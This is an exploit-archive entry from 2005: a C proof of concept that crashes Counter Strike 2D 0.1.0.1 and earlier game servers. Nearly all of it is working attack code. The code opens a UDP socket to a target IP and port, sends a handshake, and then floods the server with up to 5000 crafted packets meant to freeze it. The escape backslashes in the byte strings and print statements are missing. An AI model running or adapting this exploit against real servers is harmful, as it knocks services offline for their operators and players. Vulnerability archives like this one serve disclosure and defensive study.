[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Counter Strike 2D <= 0.1.0.1 Denial of Service Vulnerability
# Published : 2005-12-11
# Author : Iman Karim
# Previous Title : MS Internet Explorer 6.0 (pre tag multiple single tags) Denial of Service
# Next Title : Mozilla Firefox <= 1.5 (history.dat) Looping Vulnerability PoC
/*
Counter Strike 2D DoS
Affected versions: 0.1.0.1 and prior
CS2D Developer: http://www.cs2d.com/
by Iman Karim (iman.karim@smail.inf.fh-bonn-rhein-sieg.de)
http://home.inf.fh-rhein-sieg.de/~ikarim2s/
Written in Borland C++ Builder 6
20.09.2005
*/
#include <winsock.h>
#include <stdio.h>
#include <conio.h>
int sd;
int port = 36963;
WSADATA wsadata;
struct sockaddr_in p;
const static unsigned char MakeCon[]= "xFAxFAx0Dx0A"
"x68x61x72x72x79" //Player Name = Harry (in Hex)
"xCEx7BxE2x45x63x90x00x00";
const static unsigned char DoSPack[]= "xFAx04"
"x68x61x72x72x79" //Player Name again
"x0Dx0Ax02" ;
//----------------------------------------------------------------------
u_int resolveaddr(char *host )
{
u_int ip;
struct hostent *hIP ;
ip = inet_addr(host);
hIP = gethostbyname(host);
if(!hIP) {
printf("Cant solve hostip => quitting...n");
return(0);
}
else ip = *(u_int *)hIP->h_addr;
return(ip);
}
bool HandShake(int sd)
{
sendto(sd, MakeCon, 22, 0,(struct sockaddr *)&p, sizeof(p));
return true;
}
bool DoSAttack(int sd)
{
sendto(sd, DoSPack, 10, 0, (struct sockaddr *)&p, sizeof(p));
return true;
}
//----------------------------------------------------------------------
int main(int argc, char *argv[])
{
printf ("Counter Strike 2D DoSn");
printf ("Affected versions: 0.1.0.1 and priorn");
printf ("by Iman Karim (iman.karim@smail.inf.fh-bonn-rhein-sieg.de)n");
printf ("http://home.inf.fh-rhein-sieg.de/~ikarim2s/n-----------n");
if (argc <= 1)
{
printf ("n-Quick Guide-nn");
printf ("%s <SRV_IP> [SRV_PORT] [PACKET_COUNT]n",argv[0]);
printf ("Default Port is 36963n");
printf ("Default Packet Count is 5000n");
printf ("n- -nnPress a key...");
getch();
printf ("n");
return(0);
}
WSAStartup(MAKEWORD (1,0), &wsadata);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0)
{
printf ("Cant create socket => quitting...n");
return(0);
}
if(argc > 2) port = atoi(argv[2]);
p.sin_addr.s_addr = resolveaddr(argv[1]);
p.sin_port = htons(port);
p.sin_family = AF_INET;
printf ("Attacking %s:%i...n",argv[1],port);
printf ("+Attack started...n");
printf ("++Sending Handshake...n");
HandShake(sd);
unsigned char rbuf[1024];
ZeroMemory(rbuf, 1024);
int cnt=0;
int pcount = 5000;
if(argc > 2) pcount = atoi(argv[3]);
printf("nn[!!!] IF THE SERVER DON'T RESPONSE PRESS CTRL+C [!!!]nn");
for(int i=0;i<=pcount;i++){
printf("+++Sending packet nr.%i...n",i);
int len=recvfrom(sd, rbuf, sizeof(rbuf), 0, NULL, NULL);
if (len > 0)
{
printf("+++(%i)Server Responsedn",i);
printf("+++(%i)Sending DoS Packetn",i);
DoSAttack(sd);
}
}
printf("++Attack Done!n");
printf("+Server should be frozen...n");
printf("Done => quitting.npress any key...n");
getch();
return 0;
}
// www.Syue.com [2005-12-11]